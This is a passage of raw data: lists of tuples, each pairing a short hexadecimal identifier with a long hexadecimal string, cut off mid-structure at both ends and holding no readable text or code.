'8695eb90e9ffe9774171301237475542a55f437d94e98e80329567a08815a60fdbd6160ff93df18a4af74ab864f92c9d5aa5fe39b8fefb26b14f265ace787a28b9b27e41bb40f6aac23b4658dce858b6d051f3cb87a6ab1ab48bef6f86096cf17dbc552adc6bba62aa08bd4fc54c6274a355cce99968d0f29fccc4da9238db451623dd6b9ab1777ed43f7c457281f00bf1b8560fee1ee39e8b9e858ca3d7c974e877ae6962af0a2d182735b6f5205ffe2465019eb56edcb6ad98b02647e5385e16a7517a23dd4606c6305b593e34acb801bf9b2c27c126cb916ed84b352a858ddeee4dccab256bdddf59162c5d541a4e6525d44686bdc3a4c34b42c874ebaf32bf2107aa2ba819a92945c5542d2a61cc7871cc6a6f82f5069143f7ad0e605685eb010070c0bb9c54162cb65c1123bcce90839aa22633dcbff76b747b98ea926e1dd8d4438649690212e2170db6fae6d52934f2479f77c12ee5f29f3165b26c3c69979e0d3581bdfe2f35de94c18bc707d8bcdfee24e9602ed289474fc6f453d1d89581b3b4abeaecff51e70a3132c79486338bf8d766e08a72207cf02e166bd7c0831fff5367565b3a0ec8e361b0fdd241c33ed4a492971171e29c0b3b69dad4c2c65b2b91353b4a0de669f196efc67aef5edac99b370f78ae2af181c25a4b318ebfcc7f217b9c70dbad81c472267fd95cbdccd4a5922f564035f437a5d0d3c0'), ('be7dff01a5ba39c286ceab3161de8cb7', 'cd0db3bd2c54bff8628ee15fee2de935326b333f13c3544523bf939e5f0e875d19282717f858b054fd7379c1e5e25e56d39eade7aaef15e8b091336156466937cf33112a1fe73c151891cfa76854efd9cd9c7722d12cea7eb6884fe7ecd34deb0f50109143a64448cc06f6f936167469521077a991f716d9f42e529c59f9c31dced0a1b6dcc1557db2d4e95cf0f3823d1bef30d84dee5c6f73a085d0ea2e8c48bfa39986f403eb86c8e4756d79be20dd7f9d9155c13b6c8524c6af0c8ad42ff29d8fa05a530231efcc7870c4ecabc3ab6468ba01e61894b3b26feb4055f65d9aa6477af4dc26cb9a08a393bc66a0a0a153d8fdd6231c09dc6a73961b5520b71ec85db6bc6991c45531c66f9e198b8ed7a3ffba0c3315bd967884fc95ab88798be51c9fb10bcab04615ae632796085d15295a3979554f35412a3e976ebe5f7fd46719bf1ed8b324b3e168265799e475dc778bb93843f0a8087735a65aac076610b7023e0c0ca0b411ad9295751496e24c0a490ba35c245f34f960c5d8923433737ed340fabaad92b08768384b56a468aad69a9941d295f15956a9b4a13d564adec73447715b5e69dd342fe8f9d121d2725f729a9d719a1d9d098a9eb163e48d927f7a2d4b81671c297d874a83556998578657ae3b6574ebcf47c481c841b14768acffc759a7382c6184456d7f1312fef990fc9cc0078919c0cf4d00df12f31c99'), ('fab5094c91fbb6cc225bd640e7d62d74', '11c58d4db6229c9ee42db7f0188fb907b79d1a2e1ad825113d7cccda7792319853cc4d543862c7e55a3b804da3424850bafcf3f13e6f35f8071b112c0863bbf3d382ecaea81a58a41a542a0fb78544a276e5b91db774fbd0ef86cbb423cf1e4cf4e9ab4bcfb38658c6cd66672824c6d9d8d9b5f17564d889600a8819027c345ddf61376ba8a05da7e33bbf2acb619533c43b950622f5a984384191c9b1628bb760968a6c71534b94c1615849b25b6903f16045b206258fd627ababaff252b263c16f3b4ff6c1f2f0160b55d9d6e0c38a7ef509ef8f66184f099ca1efaf0fa9986181741712a0d5ce6f985012acc94e337fc31ef2d89cca49daa5a4573257c22f0b6be2f726af13adb518e1c549beb4e0b32d4126aa82714f73895b7651cbecce3348f1afb7a7d9a8a4e3ee2fbda4d441b88f75fcba25c64960cb7c898870ffb96dcf1f244b45cc89dbbca6ab0f20fbfdf11e8b00b0769d3b947eb61ad6f0c8b68491fef5d29f16e1a0b2f20bed46f0b316adec255143266b322033481b370fe7ddbcfd1abae4dbdd05b6b3b2d24378e81012bbccaac6cbdb38f48e7ac573a260503c98fe181be01a00cce2fceccdd132a3c68f8e4b385b98fe4c5e8033f1db12cc4beaa79b92fa330c238c79c666ba35bee5b4c5477df3aff2ef45ff847592fad6e811953edbcac90ff409a65a8bdc5122224e9a9358c66f6a102504838a37f5'), ('e903df76c8ccce9cd06cfa87c6835e2a', 'c88143698c599edf490f135a310b4f045c7bb3d4472cb731d676684206f5b140a5b36d75624f3dff0fde7d44ebb49514f8c59f4ec0e7db95f2746f3071503d72a39bc122193b455ea232e52a5946444c5b8104ce2fd94078ce8710dfe5e628e5fcdeae1e717a1cad1f3a4a475228b6cc6fef7840936de98e8e370acc7f15145568efbe84a5541a88e9298bcf4cf3a0f12622c6c2f843209b15c153beeebc6e340b6c971a9e08d6c34087e37aebcb2a2765371d6e9328b381ca7c0af0f17333e08952a136edbcb921f3b5970296f4bb9cbba68740bbfcc6bfaabee26741ce4b73478fca00657a41ef60a34f374a77b2dbb026c34ebb4d9a98fbd4de10af9c37613e71cdb450deb91d2a9fd64b928600ad1935bb3fdd53727ee55d3ffce7f760fde247104a5194faeb4e071c55f312d4eaf3f13af4a8cbe4ca05acc6884079d7ecc284a7dcaba2cdf7e6f957d05f1dc28043c29f764aa960e759ce4dd7663696c423cbca8f0caf428efd47db010ed1b905b066fd3004cffe291cfa73a15954533a835f5a2dbc1a13cda4cd2a74ce5ebdec8d64d752c347fe82450823f68b2b28a0178b110bc0c8fcf05122b9ece61b0a4347c1b998215aeb62a41ed5de9eef3b388390d7f8eaadeae04e810675a1f5acb492cec2e9d1eeada22c4b0c10b46b93777d120e44d8462e3fbabcf9d5ab394d2930096416c77e2bbddd06842d4289e76b'), ('fada1c6a7540ff4d6f188c3e7c98a6d1', 'ba1891b249c3da8cb69b7ceb174e48f549e3f5b5e956d30467a7cf32caf9f0f73c1194c352ddcbab2e1d355a3c4697ec5eecf5a27c39cc35dc76586dfdf415e29d44608fa047ede4b2c8474289c99d5fa5b02361f34ab2966cd60e6871ffffc5af9f70619452a76dc8683df8dc6f01cf4e6289fa6d41537e55652714a2035bfdbcac78731480f770ac437192987e09637085e04c4367fe6bd3c6c377ad3ed0c219ad250eb70d5160b1f8a91856e85c2b1c79953e242b67e1094727d737cff6de4ea7f4f8b37ce3c55cf16c608590379e842a358d2da6b3eb7f2a4f934f837d065ae403f2895e1f65bd8cc7ecf86dcd8af534d0a241aa2ee62cf0b39bb20c70cc9bc81992a57aef161503afd5b4e69f63b8d5278f5c15a88cd7c123e3137d44bf547c0afc1b0335364540c45a72c52d47ae87ad4352d1df79fdf1da0e7f6005cdacf03c9d60959a487d8793ba85140466e2272f099aed38ac91a3af1ff8b4b90b2e3db2be9b312b9d625f457ddc7b2e2ba191e5047198e9672c611c0b87c8a3804d90e7de62875b57371ce2087003bdea6712ccabe61a30390557def689cab432fa7c466e179511584d35da4ab9469f64e4a01ab4e88f3b3e142209e4da3e4f008cbe572fd9a387378d363de07f527b0fcee92d03ea11ac7aa4784972ebb50cc26078ff65844959eb240cb05a437a6971543eecb9962daaf322aa239b2e22b749'), ('7ba3d76aa59f6be4e0f3540b532d8fb1', '8d087bc32a81e604fd9b0ad757816e6b5d7417d7a1970eceb8646b0b70a067276ffb15bcc09bc561ee719fdb26ac5cf4457e21b362cf26ea915630a0d3974e61574fb09efe854be7a0609893af8e423c93fe7b3596181706cc1267e911d07af0bd21c64b0fba727695a288174b8f8fce9d8bb77f8447acde7fbaaeb96add55521d00b5df7455c2a93c309334e3947a013e33bcf44a8ad8b7024b77c150146db665a5e9019b059fa741932a1811903fcc02bbd63b7082355cfdb68ec3ea2fb5a5843c34b7db70c70c33e5753e7aac23843e71d910480a3d3209a0ff21fed2101d0629b4cf540ac59761b5fe758f645d5fc1ebe80217000e53bc752a416e44b08feec70095a2f5a113429f2a8e18afb175f0b507d7233229501b788c93fbb5332c5549e6e2eef760bf2035299c5069a9e6c6f3aeb7f171c539c6d78ca84519c8bd9f545077ba4b347437352810b7dab5bea91472e684a128dd38dee423af05b4415c09b04a2d17fe91786a2b0c034c970d1d01e66e669444709da00ae5c56b74594bb6a4e2c15ace8d98ea53d9476fd35952b956ba18581d07695f0ad48266b8f3bc8a42fb8c20fbc1a5ff73b85431d0e6350624e4b4a92b598a6949acb1bf7e16cb9f6d5475a8ec17b0652363ca189f28b7a668c3f1c56057cd41b9f0322930db666789d93a5ef47a3816bd2f02d977c60dd9b72ca8e41f4ca0f0c00b625ef79b'), ('a74569b8b368c959d2986b41b5bed7d4', 'af053b9f202031131d9119867089dc50f0d21ca6a7715fe76f5804b60d9c0a84127e169719c18edfc32ab1c5e59da61c0a75720426d6ad8c7a9ee73a24a5fb537527032b04be4668823364c555369ed9c9efcb6a2bdaa5c4c2754ae4ba6336865ba899229ac7b48dd9dfc4a3d1518625eba0488a76cec69a19fcb31c361dff833310c5e3d791c3885ac53b24b5ffb92353cbeaaf34c1b8324e84cb31c3769c7eae6432cac1d3ff53fd597af46f5c8806cc66a2b206033660b4c808b836411f6893678224d4a096de013ada1731138a67c6b9acacba73752266ec91aba06fdb322e19aeb9498dcdcb5eba768f6441e9c4709fd4b6ea1626dd7443e6a8fe562d66ffa47c337137acd9109ae3f267b123b24a8fa7d288a9f57a885c1361035c7d0eda0e2b72371e1301a0cb001ef63d2d825ffb24a354935339fe147c7d13c853cbd554015857e1f65d91b798c948404201eaa486d014d976ca5bb9dcc3b8f1415217988c8b80fda150e836d3564515cf2b48998f14dbeae202f76835b40e925179c1c974a02d9d5ef221b484e0a0cf2f12b101bdc7a34903e969175760a505ec5a760ccfa60a4a78f2146cd5b08c77673457c3fa28338bd44b808f25e1b1160c480bca739d63577577ea8de0dd0ffa1dc076d9b7dabf0f2a27b5303b7aa618c03cb0e2b6ed86f790187a3b8aa83ea4a3ffc46d0787ff73bd1c0d1b8121aa914f58')], [('994218d2f5b7f8672d717eb4b89b2e20', 'cddd35e945daebb0916317465d8c2204e9884caa749d2c9e30c25698fed3888125f438bdfcf045085fa6fa1b4a2286556ad7a719ab50fd2efadd926b46122f698974682e99bd548bd9233591572e16e52a2de330339e8d4614b3a361198ae90abd234d4aca79ba9633dd1eecad53122a28207b72112f85001faa4cb2d32d29fd997a5187bc9596f7ada608909ae3cad66c03ae2a1429a7d21416f4fc5008fc3fb95531e6b47956308b9baafe59abd7252f5cd9e6f24f02452ed9bf7acd7af1781871bd34803eaea00351be69609b131857172a1ee44f75c4a34663a8cb3ae193c2c8a5a1e8fe4e6f6de52d8dabdd1cab6cf636856fc40d521a5170aa27b160932b0a960de261560b3f44f3ae2d905581cda9adaa0c5884939cbcb100409ffc2d6525b56a6afd53d5c94ba283292989863273b08dd2e77274aecf18a17aaf9aa958bc9aafefe75663358717071d9ce2fa57cfe40f47327cb60b63297958908a67ee474c695988731157a58f6862fdcaf73f29e12d289373389da725cb88d301b22fbbd737c87e9220f8d8cf9318d812b0501ff2c5ae01dfe50021fc45af982b804c67d3948b4ba7a54e4a76de102164384de390692bf3f8c61769ddfaef3e0591610620c7c7745b99d74c714302ee976d865445af99ebfe1da1cde3887679b92edcc4146a50951538135bc0dc64676434'), ('c21792da2deb8b4aa203e157e8af7d37', '3cb9b8b918c6c24ab45fcad36896f90669523e058323c077b3548f5d5f9dc715c1aee582c5ae1b093c4799b0bcfcc3cceb6ed1ae858a097e4806749eb69024df9069582ef765934ef176b9c47485083fad0466591b3c461fe9f7d871d40c65c1b20867ea4bc70439d49453f02fc73a80bd46caad26adfb2737b469671b0866213cacb09881e340ce78a1de622400af9721c74e9d4315026a49f1537b05d877eee33a8b5f734dc1944ed67d9a6f6e88a9d4540b06bf404e2a61be7fbf708dc252fa1a14f4284bf7bda57c832d68f7d4ec6e06674863fcb80af035a7ab77219c87ecf5891b1ae287b77776f3f5bec81161f3ef33f47c78b4c84d8d57e8f95218525f94b478b74aff479647df3063f750df10208fee2eb19bdb0f6131bd6a6cb49e6ae83b14d8a29aec7476ca6bd94fd54b3b55b1ea15b5b6d96e201f15060df50d2c1ee3ac67892c5bbf230a187248b5722cab72072c960588066914df55dcb5e36d472a1fc2c88a38bded6ce693375f9d2048aea3a6b85a3a03a7d8fb4b21c39beed5d4ada1202ff4da99d10f17ae2a699e45f12493f0840e736e2a6f228a255abf47b3aaa11ef13f73d26a3f2218e140ab54cf390932d710c1eaad10be3847408e55d56dd9ef1b5c12d53455c3720284d3bb77b16a71c82f62de1c69744a2108ee2ab5407f563ca68efafb66182932bb'), ('95ef92d52db7cbc0d9a1ca0654e15e44', 'ac948a3859382b32ab468cefb80804db1639b7b8527b03cb3ee4e68f83b96c41dd40bab4508231dafaf40375e6c5e2c3418396e7eb18b32428fa4dc93fe0037b08c3800f72210fa4c59a129790bfaa853a83f5eee54e26b0cf3946bd5fde2701cc6251472f53ba37d5d34d53d3caf2af78fc35974b3dd4c71df10ee4ace821ff3f8460597e5299fb9ebd4c6bbb5193a248b80c42b001bc34477989d496eb32072f141679eac5e587d3ca11fa4d7c9fd55c3e076827ed8777970f608386e7f8e85035d5f3a7fe677ade24e2990d1a09bd6ee246c95bc3925ef8ea8c0c369111ff238aa87d68171b41f382f6c6f13128942d22fd232c6984f08369b954a92f18bc1764e0c6f48322bb6b0a4a354ec08914b73bdb8002024fe8a9d8c03440b1326d6ab04e41b3771904ae6f875a33962490ea4c24d65796b9dd4341740b8ef57bf144b8151f598d3b924532a7e5c582a564fee2dc515aee8f0996a2103047ccd70483007b3c1bd60a3a0780069e0b3aa2d3e33e6b6a778c874ac7382f12f45e82abfc5e8dcd0da565336d96199dfb55358f57a3a7b675beba721c781290a1b75a3e81ff79bb66ce97adf57e07165989661d49c8f99a962e0061470c1f9f12dcfd6cdb054b74da23a7fdd6dcd7c19913c40040b4c7231195bf1b3454c59d541cebfabb3ff96fc8c09cb383c37d8cac8a7026'), ('30540b906f3fc72458264fec14411bfa', '1d8f7a85b78c811ced76ac282444021f189700092e167fb751f47e07b2721f918e60d9d6f99d84997578261e7aa6aad17e7f0e654f7f33ae5f49b4f146ade06fd06e222d1ad0c909e0f3940042f5d01742bab8a3a3c90cb9c912c71f0e10983b7f2923b3070f6ef4d49ecfdab11757abe1c6238c112ab71fb4570ca3b574ff0790c4be1a41b37e7bc74cca137e23697c6f89eb95f5fbda4b8efdfa0dbe1900b3fb60b524a7d4808477cd391e66fb8afbfbb1a2742237700f555e3bbc79fc44dc79e1a7dece315e37280328b8c93a110d56d2a4978a644db8c24018252c384b7bcb5fd732e48ceb89c937114ee64fc380d0c5602d813c1b78f5f60811c92e5e98162e943336e6d216629724acb4d2d3be32fd7f83dbae2239b2bf3944499abc7f1e262a3f384be75effab8df43a181a5a87787f1e05914fae9826d11606bae3cf1d7573da4835ad2c3c12f1f50d3352c0a646c3e515cba755d9711f2c70779a9da950474b445f33ed0c36125d2b9c82a70749fc342be839e1665c609f679bd2d7a78c65b142a0bd2a2a7660752c1c895c4e5b88e90959ced4210dacf38e8646afad88b9ca5af52cebe75f025b1b527bd3401d060cf039a43b7e5a896174ae158ad7d7607761be4bab8760f573565e1a147cb7ed80b4fa8253e09c2b79d5592ac5d1ddde3e5dcbc2d8e0cd7161306f4c7d'), ('1d20ed96564d823c1bfdd68eefe1a8cb', '0085ab5b06bd4550d451a23068c8d5205dc80679c7fd75e958ba785022ebad73b35b661ea726b301a8fb58e5e2e156d282765f66f3891b9ed571c73c9cb390d9fa818da34c54f4e6d90bb6f38e255fe55a79e04e41312a2c31ae603bfbcdd157e8b1dc24f9333e36b242d1a93bb828ddae178fcccd5af81453c0688a094b76519bdc1f1b0a84001572b053e1f0647a3d2984c785df6d2520839598edaddfcefda49c3fd96c3ef82f42e60c9b849be0afcb19047ed7a85d69198573c255022d97b40c121a84beeea1b78b6bf26086cf06666711df206560f0ec4b4d0265a4db19f3b8814b1b54d24a8631fbc83f94613bcc28aa8b1730e487fe7275c48d6e3456b75b2e0e7e4f24c9e6cf2d97e8ece5d909f83f1d4c3b43fd3269a2bf65aaaa85a159c660235c549715bccbc41d2708fd690da640a10b297d50d0ad7fb0996ad4d7266f7bdeee21ec225e0fdcdd013561c5d4d3122200eecdeaf8cf13a8a2583111c9ff74244dd63bb8ca0b6c580d38e36477740401f29c5e4a3b51ba06eddcac7c7ea004d67be49fc39eea4400e4e82395c47715c824207bc1d81b919a9f990ef4c83ecb457ed411173604be9f5be6e54b1f1985e31e2eb4a654173a38b92341c8ef82cef3760f2d04961c7f056a3a4c4ab0c4d752e56d7d301efb4f8b7fa01bf9b813dff03391bc70577815c88e077d'), ('2566fc6e0531677b58f2af04e2da2e18', 'c52249944d5c671b5f064ef8d345e7f7abfaa9eac847fc2657fdd4112edfe490580bc5c2812f864ccc5c5e1804aac24bbba5a2bba1a93c300afb3877e97a29fad0ff6434b3651f63950c2a996a729dfbebc6ea7f72e76c9d4252a8fb39b21296fc2d90f911cb2fb1f9dd02e71ba8b941ce5d2ce40b4f5c31d56f04caf84f238c41b543b49ac563f2a92a84f7a2f26a895c1ef014edf9cb9e41ee12c4b5e1d0a3e3499e59c007e8339a38f2af8aeb7e2bc86e401f7a86272546f2d46638c0fd826ebce2ca1b5a667ca2fc2b499cb8418e208ea74f9e534fd8c235cccddd83c158623c8712a379fb52abd9d9a41309f57fc3e0887d52e14b072acd8abb7e227bd97fed58574a360217616fae7d02b60a3e5644cff84a55ff9d7f70193a2fb2e7bd29e3759fc1ea47948ab6e1ac3e1941fd56c2a817855de3cfd7f95571afbccf4d169313d1a3bc18a89b48f1a0a059f39e9a80eab90afc4a5708a41916672a4eed8ff1d92ec43a46fb83db47f0ba662ca7c3fdd16b18ad4898a158f563d6384edd08236035a70d5eca884187058597055e8aa9514399f3f8e108a52e7fcf3bda4c780100a86b16a77f145030d67955256781d5fe994c3f66aaa430d0d1fa6dd01e9f5e27590615bb845694f2322fb833588f7c9a86448f303831d024fab302f4b9c4f73eca66c801f0dfbb3c83d6509508'), ('8012bca9c9ebdeef25b1a816bd4ee9e9', 'abbbbe687598dc10daa1d0e42e12d56254d740a14c092900f11c97d4e64b12b3dd07dd7a9056df89622341e21cc2a8e1f0d47d208b9e10a5c59fb2019f2209bad78718e31863d06513659a0de3f8826c54d0fae2e0f346cea6c6fdbf3a4597680cfdbfdfce3778193b984f305b4e94954b00f8df6d816b7094c016a26386a94e2cc1c97cc53e974ae72777dba1f21d02d94ab14975accb7b60669f1b95e73549668930c0972678b9ee02a0c6c6b035f8520b8383248fbc12e0903d14824e128a01a6e0feb3d93acdaa56ac777c4c4ef3f55e2bd63e9d549c88e0cc193e5d8d38f4de868ab708a7047b0d8fb561eff726a9193d10be009ec2985a7de5211d00decfbd5ca6b4ddc3d7d82ff64d69405bf04faaef5ba463af446c4fab05b93e0e04b33a03fc64d05a58319f1f5bc225ac55c688c0699ccdb6a2b527a97b703e1b61b369cd769b6f3aa71cfdae4fb6fa48fd965e9e01ede4a2c9326bab15b83297515294ee238cbe598e7c0b4cec734e6aae9f21d00e5abc33b3009d145c2b5538b241e806c6bc33ca7b4716a6c2c22625f94c7f89dd12f1d9b44036137ef0773d0381fba52884891e1f07c62805ee664bde8e87fb8fddf184db0bf4093244818bf0ab2f615b979f0e964b08495a580bfcd59b23c2bea1314acfee09cbc14702a26c0b7c6c2bce56f6126126d7a276d24b84'), ('5b5e47ecaa0bc5a39f3020f2465413c6', '4b896a92bb56fc8d2554b8a4b2096db910729d35732a6c581c17af33d433972ba5468377583575b961df44d928b6ded0a23fbae587021ec03bd14f15f5bb4e3d677f27709eb4e9b92ef71e043558ba40c91bdc2a1cb2ae8f187ac301a0b051e58a2a5e989b8c4516273e1a5f262b5226d993e448005362e32fa00aaa38f60268c9ae6dd718f81e66d5a995e935553f97abc3e7b37dc994ae3e985b30e802979ab5880d3c51903ed545b68dc95112533a580d33947538c6e501283e01aca9119e36fbc7f613d8420cff5d4495a8c4e8ac4d355b35343d205301f816f5aea1df39dc24be1ac1d4802365b72335e1c6335f1ad92d755d0279fb22175a12d182f0ca7a40375c089365a29cba047f3ca5414120c12899735cc74dda1d949fb578698ce36bd33873c132acc007380bc4507c8eb2e2f6f6e0fa513ff08fcbc4c83f9eb63c97c10be798e08c3007f332653ca2e8bb65971e8d591fa5314f56fa52a3aa134b047d5dbdf53fc92f938e5c95aa82ab1d1df58ac19c45be82c9fe9aa91052d5079c694a7cf6696ba5d2eab2b6e0770462277b28ef8de469b740d32dca5c7728949a5a8632f0c7f546c8ab037d3e9abacdc516522de92ea0af47c673c9ab8c33bd00d198ff78832716c98bbd9b5ecda014c8f0c96219d60b84df893f5f7fb03ef7bfa3c34e499b6d7b593397fe31fcf8'), ('28b4316cbd0c150c6301cdc12bea32c1', '77e621bb9caec5147b257671beceecfbde911f28ae39fb48590072949171ae652a71fd9c464809c386148afe08c48c5e6ec640a9349f4b9bcd8b82f0c9e3afb490b3975605f31df82bbee4e06ded44c265d8c964c1bbdb3bcf4396820244dfa8776ba8ee3a93478e9d7b49c9cd60266770e4af9b64c23afac2d32c9c4a336bac1e51a04113142f19007584294eeef2f24a24cfac379fa01725ec2be37b8163692ebb2ebfcaf75e5285a1eea406f583c4f8ae62165c85bd6dad3b9746c66a929e5722af2dfedd1e215e4f4cd2567a1d438db9c4bd589e43ca4fc7d108c0e9965b40798175ad905e5f59e57b1bed5b9ea75a63a3545847406999f37dd6fb9de9d5d40579d1052da02fa355441bbd9b263f6ee552ab4568d9270734c49d4a68da269dae11b2306d6fdf5f697b6acb765a0eedf6cd9aa38f234b2efbc87f44abb89717e888c0069444ccec5bca72a08673db0ff5e876a3199020700b214871aeb07adb36b2fa0caa4292f3958a7cfe49b49cb85b95554ee80c4e56dc23bba28664c228f57e70dad16240a24287136438a902cd3f3676fc4dcf71fe0ed1e67baaec9f39f1c02d45b3e45f62c0938982d00058f5b83f1f5ee13e33e40e599d5de22b4a85c9eb51e3bf7a3ff1fc553843d062af641e1a6bef6918ddd457fab17ea3ef008e53e060057c520e2ed12c105e41712f'), ('c7bab984d83b0fb2a252ef74aee3a332', 'a6c7e498a9a3768f48e79e464999be97e5718f8c31dc4342d16bcf43155d241e6ddb053e55d36a156b14b3de510ae0970136c7e4c8b9cbb4e010691a504ba9a125863af5d4ef701cb4f938c8b732975827bd2c9657c0b1544f4566aaaed61294d6e604a60c88d5e889fbd873b50172355039d19f97af087158a4a637bc7d4383c11b072b2fd3247f948e074f6fef9efe901221189b33975a8ff2b2d5e1921c80614cf51cf22b8156da2777d3ad41abc56c8b84692a8e15d03241e29c2547bba306ec406e29a206b0ca6f1f4f61757d9fc83c86fd413cdc729b8fc4a4cc66ede3879a08a18548ac4eded64eed36006cc499e195b1a1a6512ba3dd760354254a0316d4019b4c8c697053986d84a6371f4db01422396e25ca5d3f1d733bbaab312e1942f14aaf7ed7ab20d464de5e6b20d1ea7ce4e80db75b26939598e416c51a7c8ac82113a3f891fd1bfb8f93258ba1a10db17d2837719b465a0487bf6952cabbef45211b9a636a97b400ca35db248aeee4e8dafffa9931985e3b2a6d5503081a4c2e1fb24268bc62733e50615b764aa0c7ea75912f64692de74a517f2f8477417bf83a3f085d3a3ee5e7ef0cfcb7e1a595ff7f82d277991e5b7b0db6d4bce67c03192374855a16ed5dd8363a923e34ad27af84d0a094adbf020a5c2e460311cfbc9e453a99b13416f486ad88a2716017')], [('a75edbc0dcdb1e6163f2876702ee07f3', '86558f90c2f874954916a64e01945befbb8ba4c3ca36ca3307e86f6e942c67d0dcecafb1895e64f2ddbe3b7b861c61ba290b0fd0eaf2c5e03d2bb831efe7b9b457f5ba8298cb35b713d15946d2348c529e74b80afade7916faaaad698dd1e826f25b64e42f185c77cc6a331a7603f763d6085531818854cd56c1a515cde3f867f4dfe5367b85184431e563c8a7085bc603711318e52373d18508700c4e3a694c68f5e76bcb6d8be686c7a7c0ed1f7482ed68ada0d7f0b608d49113e95571aff17a055b435bde520365b9b9ee90d5bf162a4bc13d0ad2dca846a239dc6736344a1adfb701ba886956e94ae10e202d65962cfc374ffd22533486c98f2e7f220dd84fd92253b28b7528946d64a7e4e3584e666cc28e591f08e5c2a066bc15fe93f7f68e2930726d4e85a6692d2a1a7acacc9c2466da556b7d7fdb2f5bc6969d22b446b4cb5bc72a7f91559c8fa1fd75d38b0710b806c1f5a030def5a9d16e35fb6cca9734a173ddbd1ead41db01c6774275e97aea31fc201d48c3840634aff535cfacfe2780be5682e5b1411ab5a96a85bc063e1df5ac2909ecc12fb4ad09485734356c31df1af9fdc0c10f0b38c2b0f16aef895ac6b409842cee21cad2fe22aa85b040c2a3e4c136e26963afc52f1d1008f211e4ec1cab2a82a0e1f53419b2cffce38143fec790e8ab62614de1eacd180e09b12c787eee1b738b487c0c1b4b3df1'), ('c55503b430cc81a392721667acc1bf66', '49a84566a7ff58ff5b83f8fb3718fbe54b21a67f7550a3246119747b5e1585ec407c6617d3a7095c27082255b1f2778fd75932e11c3adc765e177671a084c499c6671846a629c0c39bbe525507ab86428824b0d7ba97caa1e963b33297086f3e3c4a22887d5cfda88c5f27034a33613818694a19c099caa19c1712e0443459348b0a7e59a13547520f0a71cc321750cff9add7c4143fb0ede59895ecc72b8501829f83f443da1b3aea3db484acb5005866c9e226c42fbd6392c3f0bcd521da7e22cdf21a58b248bda545ffcdfd4c5503bd674997f33ec87e2615840051e50e663c1793b046a5e4cbd6416de27f50aa4e74a3d358e213418cdc33dc7c9f733e54a255ff9a61026c43a9ba581584b18d897710e062cb22cd1532f5c77824c4701ff107c24f980e3f943feccc529a42b79851b18a7139d6d4ab594cac1a01e17ac71197142dd0c358ed9da85b7f7dac3016241832ff9d1d81666ddd1a592d7ea96e838ab8ba198a6c6f050dc6a9308a886ec1ad3053b18b7eaee2258b0e0a64db9c97447472878549341f2829c4fbba12316ba77f83d9247f2eec3a049c2037005e532b9b382b5308e9d5ccb7fda73b1777a7ad5b5798b3b19c1279e13ec3d213e19f5f0c648a1f66ff6d383ccddd19d43835177bbad3a5612a94314ba85a8081b7867e0a97bbf0a48bd2cc84d9571772e9affaad63a717cf33bc5b2c31e8014e32'), ('e2f64a7a47c93fa87829f53c4ef93cee', '9809d7b934924ac854d75ba9db73c5b33ccb168496268ea257c707ba3a026c921f0f9c4cb3ed6bb7c8463a0340ff8da6d33b5863689c6c674902b71a4a20155b1d99c0d723701dadedf5ebfb811919be8438cc6e936c6e4770b1ce8cead1e5998fbf7e28577aa09867f179f3bd42e3b1282d5e24aa30b05e90f180a4a1707adc42f3a73806354b354d3650afe5a3d36fe6f3299259e58083d7eb5bd642566f1a58b713f9d10da16cf7b267b03048341f1ffffbd2c45e9bf5fbe685342fbe70016138ea181711531150ceb5d104989fe174ff583692cfa495bd3b55d4bfbef51541d0a7d101ff12c957eddd124322f46175887b627c30e9e87baf56d100640fbf271391a121224401ac54166f126c6eeea95ffa0c9dd99016b232e1f62045ffccd3546d95424d1665bc0998ffc413bf9be6148565a04170f9495e61d094a9e28a2bb14f12092aa3779e1cc01403b83575020a294742011f6e407aeacdf5380b5b9eafe42aae0c5960eec92d100d6cd65f063449a0380ef8ddc15a09b06ec0c6f2fedc27a3c50bbabaffb7766b33819b72044d0b96b8244263b024e244f1ae1fed443d1f39f9c302bbb693367e1c827839ea51b6eebdb0b83f212db23f139e18c3bb431de226ecad0900d8fd0713deb1a3128c69ab887d6a9f38aa9c14a3d68cb65cbd0b12b9813c8641998d2d02143a97ecdf2c44938e5cdbe02ad37ca1793fe7'), ('eb22dd0fbc02e6eb67f0434e3f97e8bc', 'fc4c234740c3ccb8ec21e3c775466a3987d38ee96876d3c1cdd12e75f894eadece7d63fe9c00bc2c7ba5ca042a6da66fe564d4f8fb8900b834348d357f026779c299f967277fba57f02915340c626dbc110ce8998b547e94ba419423a11f02485cc5c7d83cb199fe68d025330684ef99efaa4ee9854feb6e91483a7ca57adc6769a097cc8a50f0ee683082a988662bb48674cd47d2d676597b3a60d7383b75bac76c86fac0d44ca5a0f5058ce4824ea8a0871352af61e8c00d63184f931f83ef1d409ee3b20e30ebe33062c051f1b5c622eb37a6ab8999dd23a1f02b6e5f667d28f7ca66b350236b07992fde8525e2542802da38da1f52d659f4ca829ab18bcb74c9c202cda35b71996b1d10538c8746b799a3ccccf5f11b7cf2b78f9eb33d5ed58a6261db24b73b87ac316fb3eb54085385af0e9dac4ce2faae71cac487b1bba536948b552d717ce04318f7cff1f8ba527f3a992456c6b821236d911ff145fa9d02bf1aa4c498d1006c381463063d166e47c57257eb79d8eb29593ed439c3443a5bc1ec021784b6cbe870c2f5417ebf9775d190ce661f274af3d82f0baf736ff363c5055171d17e9811b7df42f747e309cba96fcfb4616512c99de7617d54b2de501bd0075656b82785d59421990a2b112f87c63d4ed33df9693eb665cae21bd070005c1f5e629820845b4353f624a3e8896a8a33470be3fdb113faac29794f'), ('9ab4b380aa24602c875486fb8b7250e1', 'f12368dba4d3cb351b3897092925b4849072f65c93aba6d95cc1cfb5b0483dd4d63e19baa9f88ac790a4ac1e4339c35436e04aba83a5e4473cb97159d6fe492b57789a76eeb61d651346aa230f728705cd73b345009dda856ba99ab773f4ae9e79d3c53108a571b2165ca55bae8c015e6d689da9e808c1853faa5f88891909e2b3d6d9c1fb9217e1692e43c2cd856e97332d1c94f556542442125eb39866144881d26ee2e0406f06b2c4f19b3170d7a05a2c9443ebf428e3e8b8bde55859c3a22e35715d5997b73e03bad9f21cacb614086ad8e2d07c421f1d53479001b876937054d4bcc1281ddd3816584160cae154ee719755f24ad122948474144f46df838262dacf261b39e7610f7edfe931131e775db33ae8c6dd94581375638d9456012e8e45c2a78400211b76da5c4e8a6cf36f7c3e7613eb9a0eca4a1c5d024b6e4c77648798c5d8682a975f0606e282e5766236cc65101a9eae1e70c1cc78af90d42324918413dbaa8e4561770b1a397d05d89c2087617a5ce0af10a59d36bead7a64e9c4b3d53566bdaa2925e93f4961a77c158cb1974f9fd543ba4b60d21759fe42d94fbaf37ad5c7c71229f2cb7397f21d9b6b10f06ec681a2bee9f041b39c0b58390c72f